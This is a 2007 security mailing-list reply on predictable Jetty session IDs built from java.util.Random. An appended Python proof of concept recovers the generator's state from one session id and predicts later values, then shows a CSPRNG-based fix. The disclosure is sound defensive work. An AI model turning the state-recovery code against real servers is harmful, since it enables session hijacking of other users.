Network Security VulnWatch

Re: Jetty Session ID Prediction

Subject: Re: Jetty Session ID Prediction
Date: Mon, 05 Feb 2007 20:42:00 +0200
NGSSoftware Insight Security Research wrote:
=================
Technical Details
=================

java.util.Random implements a linear congruential generator, of the
following form:

synchronized protected int next(int bits) {
    seed = (seed * 0x5DEECE66DL + 0xBL) & ((1L << 48) - 1);
    return (int)(seed >>> (48 - bits));
}

Jetty generates a 64-bit session id by generating two 32-bit numbers in
this way, so we end up with an encoded 64-bit integer. By decoding the
integer and splitting it into its two component 32-bit integers, we can
easily brute-force the generator's internal state.

So it outputs the full 64-bit integer (encoded), huh? Consider yourself lucky ;-)
With Apache JServ, I had to deal with a session ID constructed in a similar manner, yet only the last 6 symbols were output (~31 bits out of the 64).
You can read about this in my "Hacking Web Applications Using Cookie Poisoning" (April 2002) - http://www.cgisecurity.com/lib/CookiePoisoningByline.pdf
Apache JServ is "example #2" in that text. You may find part of my analysis relevant to this (Jetty) case as well (BTW - do you plan to make your tool/source available?)


Regards,
-Amit
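The point both the advisory and the reply make is that an id built from java.util.Random outputs is reconstructible: next(32) reveals the top 32 bits of the 48-bit state, so the second half of the id leaves only 2^16 candidates to check. The following is an added Python illustration, not code from NGSSoftware, Jetty or the reply author; it models the LCG quoted above, builds a two-output 64-bit id, and shows that the id alone determines the generator's later output. The hex rendering of the id and the example seed are assumptions for the illustration (the advisory only says the integer is "encoded"), and the final function shows the replacement a defender wants: an id drawn from the OS CSPRNG.

```python
import secrets

# Constants of the 48-bit LCG in java.util.Random, as quoted in the advisory.
MULT = 0x5DEECE66D
ADD = 0xB
MASK = (1 << 48) - 1


class JavaRandom:
    """Minimal model of java.util.Random: only next(bits), which is all the
    session-id construction described above needs."""

    def __init__(self, seed):
        # java.util.Random XORs the constructor argument with the multiplier.
        self.seed = (seed ^ MULT) & MASK

    def next(self, bits):
        self.seed = (self.seed * MULT + ADD) & MASK
        # Java casts the result to (int); the bit pattern is identical, so the
        # model keeps it unsigned for simplicity.
        return self.seed >> (48 - bits)


def advance(state):
    """One LCG step on a raw 48-bit state."""
    return (state * MULT + ADD) & MASK


def make_session_id(rng):
    """Two consecutive 32-bit outputs concatenated into a 64-bit id.
    Rendering it as 16 hex digits is an assumption for this example."""
    hi = rng.next(32)
    lo = rng.next(32)
    return "%016x" % ((hi << 32) | lo)


def split_session_id(sid):
    """Undo the (assumed) hex encoding and return the two 32-bit halves."""
    value = int(sid, 16)
    return value >> 32, value & 0xFFFFFFFF


def recover_states(out1, out2):
    """All 48-bit states consistent with two consecutive next(32) outputs.

    out1 is the top 32 bits of the state that produced it, so only the low
    16 bits are unknown; each of the 2^16 candidates is kept if advancing it
    once yields out2. Usually exactly one candidate survives."""
    matches = []
    for low in range(1 << 16):
        candidate = (out1 << 16) | low
        if advance(candidate) >> 16 == out2:
            matches.append(candidate)
    return matches


def predict_next(state):
    """Given the state that produced the first half of an id, the value the
    generator emits right after the second half: advance once for the second
    half, once more for the next call."""
    return advance(advance(state)) >> 16


def secure_session_id():
    """What a session id should be instead: 128 bits from the OS CSPRNG,
    with no recoverable internal state behind it."""
    return secrets.token_hex(16)


if __name__ == "__main__":
    rng = JavaRandom(20070205)            # constructed seed for the demo
    sid = make_session_id(rng)
    hi, lo = split_session_id(sid)
    candidates = recover_states(hi, lo)
    print("session id:", sid)
    print("candidate states:", [hex(s) for s in candidates])
    print("predicted next output:", [predict_next(s) for s in candidates])
    print("actual next output:   ", rng.next(32))
    print("CSPRNG id instead:", secure_session_id())
```

Running the script shows the predicted value matching the generator's real next output, which is the whole vulnerability in one line: anyone holding one id knows the next one. The brute force costs 65,536 LCG steps, so the check runs in well under a second in plain Python; the fix is not a larger id but a generator with no recoverable state, as in secure_session_id().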
